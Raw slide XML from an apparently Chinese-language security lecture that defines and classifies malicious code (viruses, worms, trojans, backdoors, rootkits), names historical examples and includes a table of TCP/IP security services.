        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>恶意代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48131" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{268913D9-5B90-4FEB-B844-A4366D547A59}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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dirty="0" smtClean="0"/>
              <a:t>病毒：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>能自我传播、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>需用户干预触</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>发执行的破坏性程序或代码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>CIH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、爱虫、新欢乐时光、求职信、恶鹰、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>rose…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>蠕虫：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>能自我传播、不需用户干预即可触发执行的破坏性程序或代码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如红色代码、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>蠕虫王、冲击波、震荡波、极速波</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>特洛伊木马：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>看起来具有正常功能，但实际上隐藏着很多用户不希望功能的程序。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通常由控制端和被控制端两端组成。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如冰河、网络神偷、灰鸽子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>恶意代码的分类</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179" name="灯片编号占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F84C6806-397C-4D8B-966A-F21FCE116E61}"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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>后门：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>那些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>绕过安全性控制而获取对程序或系统访问权的程序方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>软件开发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>阶段，程序员</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>常在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>软件内创建后门</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>程序便于修改程序缺陷。发布软件前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>没有删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>后门，就</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>成了安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>风险。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Bits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>WinEggDrop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Tini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>RootKit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者用来隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>自己踪迹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和保留</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问权限的工具。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安装目标上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自身及指定的文件、进程和网络链接等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>信息，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>RootKit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Hkdef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ByShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>拒绝服务程序，黑客工具，广告软件，间谍软件，恶意网页</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"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恶意代码的分类（续）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51203" name="灯片编号占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5C405ADB-89F0-402C-8BB1-901696F71625}"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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>—— TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>协议模型安全服务的部署</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5129336" y="6407944"/>
            <a:ext cx="1026840" cy="450056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D3CD34EB-D20B-49F8-96F0-1B0A7C1DAA0C}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="573442" name="Group 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="323850" y="1327150"/>
          <a:ext cx="7416502" cy="4939348"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="658017"/>
                <a:gridCol w="2077965"/>
                <a:gridCol w="1152128"/>
                <a:gridCol w="1008112"/>
                <a:gridCol w="1224136"/>
                <a:gridCol w="1296144"/>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服务</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rPr>
                        <a:t>TCP/IP</a:t>
                      </a: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rPr>
                        <a:t>协议层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3840">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网络接口层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网络层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rPr>
                        <a:t>传输层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应用层</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN"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认</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对等实体认证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数据起源认证</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自主访问控制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43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强制访问控制</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机 密 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305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无连接机密性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defRPr/>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选择字段机密性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业务流机密性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完</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整</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不可恢复的连接完整性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选择字段的连接完整性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6700">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选择字段的无连接完整性</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数据起源的非否认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6388">
                <a:tc vMerge="1">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传递过程的非否认</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anose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="13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zh-CN" altLang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="宋体"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ll/>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r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>病毒、蠕虫、木马之间的界限已经不再明显；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>综合使用多种攻击手段：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>传播：计算机系统的漏洞、电子邮件、文件共享、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>浏览、即时通讯工具等</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>社会工程（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>social engineering )</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333826" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>各种恶意代码融合趋势</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49155" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89911C4B-57AF-4D2B-A30E-555BB6C7F7ED}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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mtClean="0"/>
              <a:t>也</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>称木马病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>特定的程序（木马程序）来控制另一台计算机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>通常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>有两个可执行程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>控制端：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击者</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>端：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>服务端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>受害者</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A14BEF07-BD7B-49AC-8394-8967A3627B43}"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bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="2957513"/>
            <a:ext cx="8032750" cy="785812"/>
            <a:chOff x="611188" y="2957513"/>
            <a:chExt cx="8033149" cy="785813"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="Group 2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="959111" y="295751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1" name="AutoShape 3"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="904" y="2057"/>
                <a:ext cx="3976" cy="662"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 16667"/>
                </a:avLst>
              </a:prstGeom>
              <a:grpFill/>
              <a:ln w="12700" algn="ctr">
                <a:noFill/>
                <a:round/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr fontAlgn="auto">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="zh-CN" altLang="en-US">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="AutoShape 4"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="912" y="2064"/>
                <a:ext cx="3966" cy="326"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 36505"/>
                </a:avLst>
              </a:prstGeom>
              <a:grpFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:rou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59" name="Group 11"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="611188" y="3063875"/>
              <a:ext cx="744168" cy="608013"/>
              <a:chOff x="579" y="1386"/>
              <a:chExt cx="385" cy="383"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3076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pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="30763" name="Group 13"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="587" y="1392"/>
                <a:ext cx="369" cy="369"/>
                <a:chOff x="587" y="1392"/>
                <a:chExt cx="369" cy="369"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="3076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6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6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6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grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35870" name="Text Box 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="black">
            <a:xfrm>
              <a:off x="1473243" y="310038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lang="zh-CN" altLang="en-US" sz="2800" b="1" smtClean="0">
                  <a:latin typeface="+mn-ea"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>某个无害网页，其实隐藏了木马代码</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30761" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="758089" y="310038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en-US" altLang="zh-CN" sz="2400" b="1">
                  <a:solidFill>
                    <a:srgbClr val="080808"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
